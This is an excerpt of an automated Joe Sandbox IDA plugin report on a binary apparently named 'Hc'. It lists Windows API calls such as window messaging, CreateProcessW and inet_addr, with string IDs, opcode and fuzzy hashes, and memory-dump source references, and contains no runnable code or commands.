                                                                  • String ID: 0
                                                                  • API String ID: 135850232-4108050209
                                                                  • Opcode ID: 9d8a87db221808aa6f52b40ac1ed27e961bcc59fa8af010911c2abc5d4c6c244
                                                                  • Instruction ID: 15511bc9b8b62cffec532e812c51bd55809b2cb24bd27763f44cbb08675949e3
                                                                  • Opcode Fuzzy Hash: 9d8a87db221808aa6f52b40ac1ed27e961bcc59fa8af010911c2abc5d4c6c244
                                                                  • Instruction Fuzzy Hash: 2941BF712047029FD720EF24D885F6ABBEAAF84724F144B1DF9A597391D730A904CB66
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006BDCD0,00000000,?,?,?,?), ref: 006B4F48
                                                                  • GetWindowLongW.USER32 ref: 006B4F65
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B4F75
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: 6d2a59c918e29f3636d86b8ad6aa71c8c510ed35d06431521da7f118fd91cacc
                                                                  • Instruction ID: d1550166ecc025b1042974fa890d0016c270b4fb76b08cd55884afd4025eee30
                                                                  • Opcode Fuzzy Hash: 6d2a59c918e29f3636d86b8ad6aa71c8c510ed35d06431521da7f118fd91cacc
                                                                  • Instruction Fuzzy Hash: B131A1B1204605AFDB208E78DC45BEA77AAEF48334F204725F975972D1DB70EC919B50
                                                                  APIs
                                                                    • Part of subcall function 006A3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,006A3AD4,?,?), ref: 006A3DD5
                                                                  • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006A3AD7
                                                                  • _wcslen.LIBCMT ref: 006A3AF8
                                                                  • htons.WSOCK32(00000000,?,?,00000000), ref: 006A3B63
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 946324512-2422070025
                                                                  • Opcode ID: adbac5e7b011e05d99041d14cdd99eff2d367b947d2a7516f5ebe75d917582c8
                                                                  • Instruction ID: 39422ce1bb05f4ede992498ce7d4fbe2eb9bb593fd6d3161e06e38bcdc1aec9a
                                                                  • Opcode Fuzzy Hash: adbac5e7b011e05d99041d14cdd99eff2d367b947d2a7516f5ebe75d917582c8
                                                                  • Instruction Fuzzy Hash: B43192756002119FCB10EF68C585AA977A3EF26314F248159F8168B3A2D731EE45CB70
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006B49DC
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006B49F0
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B4A14
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: 4cb17b5340415c1d5e33456785de10bc2447bf0f6c9b71575f8ba232eb105ce2
                                                                  • Instruction ID: 27fac29144594a84bbafcf7159ea3dd29482996b1e2b42d5735036ce40d341c6
                                                                  • Opcode Fuzzy Hash: 4cb17b5340415c1d5e33456785de10bc2447bf0f6c9b71575f8ba232eb105ce2
                                                                  • Instruction Fuzzy Hash: 3F21DE72640219BBDF119FA4CC42FEB3B6AEF48728F110214FA156B1D1DAB1A895DB90
APIs
• SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006B51A3
• SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006B51B1
• DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006B51B8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: MessageSend$DestroyWindow
• String ID: msctls_updown32
• API String ID: 4014797782-2298589950
• Opcode ID: db630436960cb7027ea2500fb565b3769121c89bd06f61b1897b8aa815d2bf3b
• Instruction ID: c3e01199898f7eb561f948bd4f4f0632d469ccdfb4e34df907b125b4b61ff4d6
• Opcode Fuzzy Hash: db630436960cb7027ea2500fb565b3769121c89bd06f61b1897b8aa815d2bf3b
• Instruction Fuzzy Hash: BB218EB5600649AFDB10DF28DC81EFB37AEEB59364B040159F9019B361CB70EC51CBA0
APIs
• SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006B42DC
• SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006B42EC
• MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006B4312
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: MessageSend$MoveWindow
• String ID: Listbox
• API String ID: 3315199576-2633736733
• Opcode ID: 3d9f1731efe854e59bc3ace5e81852650b555029031f306eeee72362658c48d8
• Instruction ID: e42910030958afc118dd9495ac30f1fdf26a2234cf004cb253b31067aa1003f2
• Opcode Fuzzy Hash: 3d9f1731efe854e59bc3ace5e81852650b555029031f306eeee72362658c48d8
• Instruction Fuzzy Hash: 62218072614218BBEF118F94DC85FFB3B6FEF89754F118124F9049B291CA719C929BA0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0069544D
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006954A1
• SetErrorMode.KERNEL32(00000000,?,?,006BDCD0), ref: 00695515
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: ErrorMode$InformationVolume
• String ID: %lu
• API String ID: 2507767853-685833217
• Opcode ID: 10f2eb5c0b9011e84b56a4a9c5e1a3d7cb8a38a92a2bb185145f68a642b1ebc2
• Instruction ID: 30cfb2a7535613367eddbbe92263c7defb39d4d83d3264e86d5d93df7d9b9f72
• Opcode Fuzzy Hash: 10f2eb5c0b9011e84b56a4a9c5e1a3d7cb8a38a92a2bb185145f68a642b1ebc2
• Instruction Fuzzy Hash: 61315070A00109AFDB51DF64C885EAA7BFAEF04308F1540A9F509DB362D771EE45CB61
APIs
• GetActiveWindow.USER32 ref: 006B8339
• EnumChildWindows.USER32(?,006B802F,00000000), ref: 006B83B0
  • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: Window$ActiveChildEnumLongWindows
• String ID: (o$(o
• API String ID: 3814560230-1888461534
• Opcode ID: 59d5c8f87e69d64c1a803e18d800f22fe384b0e0558aca7d408e9786d2fc14c0
• Instruction ID: c0a50b88e104ca49244fad43240c43be1fce4264203b3b05f371c606ad06054b
• Opcode Fuzzy Hash: 59d5c8f87e69d64c1a803e18d800f22fe384b0e0558aca7d408e9786d2fc14c0
• Instruction Fuzzy Hash: 90215CB4205606DFC724DF69E850AE6B7FAFB49760F200619E875873A0DB70A880CF60
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 006B4CED
• SendMessageW.USER32(?,00000406,00000000,00640000), ref: 006B4D02
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 006B4D0F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: f35e8eedd34a47287c632d157db0d2d7d06288331ecac86aecb5ec6ac971dd2b
• Instruction ID: 8d5b65aad113c35adebf81cdf5d3ff68bd7d3c2b3801b2d777a479506c7af7d3
• Opcode Fuzzy Hash: f35e8eedd34a47287c632d157db0d2d7d06288331ecac86aecb5ec6ac971dd2b
• Instruction Fuzzy Hash: 531136B1240248BEEF205F65CC06FEB3BAEEF84B64F110124FA50E61A1CA71DC90CB10
APIs
  • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
  • Part of subcall function 006836F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00683712
  • Part of subcall function 006836F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00683723
  • Part of subcall function 006836F4: GetCurrentThreadId.KERNEL32 ref: 0068372A
  • Part of subcall function 006836F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00683731
• GetFocus.USER32 ref: 006838C4
  • Part of subcall function 0068373B: GetParent.USER32(00000000), ref: 00683746
• GetClassNameW.USER32(?,?,00000100), ref: 0068390F
• EnumChildWindows.USER32(?,00683987), ref: 00683937
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: aad484e01276c2820e23cc5606972e34a516aa0d28514ad8b460f7974aace1dd
• Instruction ID: 3d34094ee88fb4455f252c449d4ae58adaa89baebece3fcd2827878defeae4ec
• Opcode Fuzzy Hash: aad484e01276c2820e23cc5606972e34a516aa0d28514ad8b460f7974aace1dd
• Instruction Fuzzy Hash: 9211E4B16002196BCF41BF749C85AED77ABAF94700F008179FD09AB392EE709A45CB34
APIs
• DeleteObject.GDI32(?), ref: 00625A34
• DestroyWindow.USER32(?,006237B8,?,?,?,?,?,00623709,?,?), ref: 00625A91
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: DeleteDestroyObjectWindow
• String ID: <)o$<)o
• API String ID: 2587070983-1376019333
• Opcode ID: 2ace4e5710cd19e0f6c21bdfe45e30fc8876bd054ff5be8024b1d5e638d19d73
• Instruction ID: c1cc4deab4b342639804666dfa36edc2d8f82601bdc47ac89c624a12366996de
• Opcode Fuzzy Hash: 2ace4e5710cd19e0f6c21bdfe45e30fc8876bd054ff5be8024b1d5e638d19d73
• Instruction Fuzzy Hash: 7121E534606A26CFDB28DB2AF8A5B7837E3BB45311F04A159E8029B361DBB49C45CF45
APIs
• GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006B6360
• SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 006B638D
• DrawMenuBar.USER32(?), ref: 006B639C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: Menu$InfoItem$Draw
• String ID: 0
• API String ID: 3227129158-4108050209
• Opcode ID: 2621e5a8a4fb1a9fc8f555a2389e1aecd49678cd8117656cc47d2699d6b96781
• Instruction ID: 981e241cf0378a53a0d7cca09adb7caffd35214c3e95483d55c26db69b9d4a9e
• Opcode Fuzzy Hash: 2621e5a8a4fb1a9fc8f555a2389e1aecd49678cd8117656cc47d2699d6b96781
• Instruction Fuzzy Hash: B3015EB2510214AFDF619F51DC84FEE7BB6FB44351F108099F54A96150DB3489C5EF21
APIs
• GetForegroundWindow.USER32(?,006F28E0,006BAD55,000000FC,?,00000000,00000000,?), ref: 006B823F
• GetFocus.USER32 ref: 006B8247
  • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
  • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
• SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 006B82B4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: Window$Long$FocusForegroundMessageSend
• String ID: (o
• API String ID: 3601265619-1684096767
• Opcode ID: cedfa1b5964f1034c657021250430bfeb904724481b2544e4b4321142e6bdfa5
• Instruction ID: 0cea4d6c4225bdbbe27d2bff702a4e27080195c283f741daf73f34b59ebbfb70
• Opcode Fuzzy Hash: cedfa1b5964f1034c657021250430bfeb904724481b2544e4b4321142e6bdfa5
• Instruction Fuzzy Hash: 7E015E71602911DFD3259F68D864AE937EBEB89320F14426DE5168B3A0DF316D87CF80
APIs
• DestroyAcceleratorTable.USER32(?), ref: 006B8576
• CreateAcceleratorTableW.USER32(00000000,?,?,?,0069BE96,00000000,00000000,?,00000001,00000002), ref: 006B858C
• GetForegroundWindow.USER32(?,0069BE96,00000000,00000000,?,00000001,00000002), ref: 006B8595
  • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
• String ID: (o
• API String ID: 986409557-1684096767
• Opcode ID: fe26346ff05910d5004603de14c187e4282ed7247205123cb34470938acc69e7
• Instruction ID: c27a0db6d7455c228fb39d990f784467a9c40405c1ce074e8645d3eb0d6c925b
• Opcode Fuzzy Hash: fe26346ff05910d5004603de14c187e4282ed7247205123cb34470938acc69e7
• Instruction Fuzzy Hash: 29011B72501706DFCB74DF69D894AA537A7FB44321F149629E521873B0DB70A990CF50
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006F4038,006F407C), ref: 006B8C1A
• CloseHandle.KERNEL32 ref: 006B8C2C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
• Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_620000_Hc.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: 8@o$|@o
• API String ID: 3712363035-1293239338
• Opcode ID: 162267fbd27936e68a0429aecbff850eceac01865837bcf0a60496ea90005d8a
• Instruction ID: 39cb6037ae3ff88c92d847593a73efe1cb2585b9e57f5b3d003a93297b396755
• Opcode Fuzzy Hash: 162267fbd27936e68a0429aecbff850eceac01865837bcf0a60496ea90005d8a
• Instruction Fuzzy Hash: 9BF05EF2545315BFE3106B60AC46FB73E9EEB05350F411021BB08DA5A2EE764C40C3B9
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0067E797
                                                                  • FreeLibrary.KERNEL32 ref: 0067E7BD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                                  • API String ID: 3013587201-2590602151
                                                                  • Opcode ID: 6b7742ba4184e79b767304030b4cbf30b1f4c14dd5d04f3e8d828a6e340bfd29
                                                                  • Instruction ID: a11a275fe6e3c158e4220bc47c0afac1c3997e190cc0817b0328ea2294abc8bc
                                                                  • Opcode Fuzzy Hash: 6b7742ba4184e79b767304030b4cbf30b1f4c14dd5d04f3e8d828a6e340bfd29
                                                                  • Instruction Fuzzy Hash: DCF02BB1C026159FD7355B244C84EAA371B6F14B00F1145E4E809FF151FB31CD89C794
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02d60be94a82db8d54981ad6fbcab163a03ea646e5505c31b12f0c39bb08fb7e
                                                                  • Instruction ID: c5e93854f029e913a3b9a1ec988168c541f97786ac4a40b134d4ade10a8bd3b2
                                                                  • Opcode Fuzzy Hash: 02d60be94a82db8d54981ad6fbcab163a03ea646e5505c31b12f0c39bb08fb7e
                                                                  • Instruction Fuzzy Hash: 45C17075A00206EFEB54DF94C894EAEB7B6FF48704F108A98E505EB251D731EE85CB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __alldvrm$_strrchr
                                                                  • String ID:
                                                                  • API String ID: 1036877536-0
                                                                  • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                  • Instruction ID: 88789ed7499252ffbd1dd00be6bdf012993c405a7d44af1038600537fa4c26c9
                                                                  • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                  • Instruction Fuzzy Hash: 90A178729403869FDB21CF19C8917EEBBE2EF11319F1441EDED959B381CA38898AC750
                                                                  APIs
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,006C0BD4,?), ref: 00680EE0
                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,006C0BD4,?), ref: 00680EF8
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,006BDCE0,000000FF,?,00000000,00000800,00000000,?,006C0BD4,?), ref: 00680F1D
                                                                  • _memcmp.LIBVCRUNTIME ref: 00680F3E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                  • String ID:
                                                                  • API String ID: 314563124-0
                                                                  • Opcode ID: 24d17bcb98d0d338f495abde287b43a8e41d022fdb7fda3bf38ead7d6343b834
                                                                  • Instruction ID: 65890f6c6ea47beaf82ea897bd3553c2612d15bf3c971ca064bbf9520684a67e
                                                                  • Opcode Fuzzy Hash: 24d17bcb98d0d338f495abde287b43a8e41d022fdb7fda3bf38ead7d6343b834
                                                                  • Instruction Fuzzy Hash: 32812D71A00109EFDB54DF94C984DEEB7BAFF89315F204558F506AB250DB71AE0ACB60
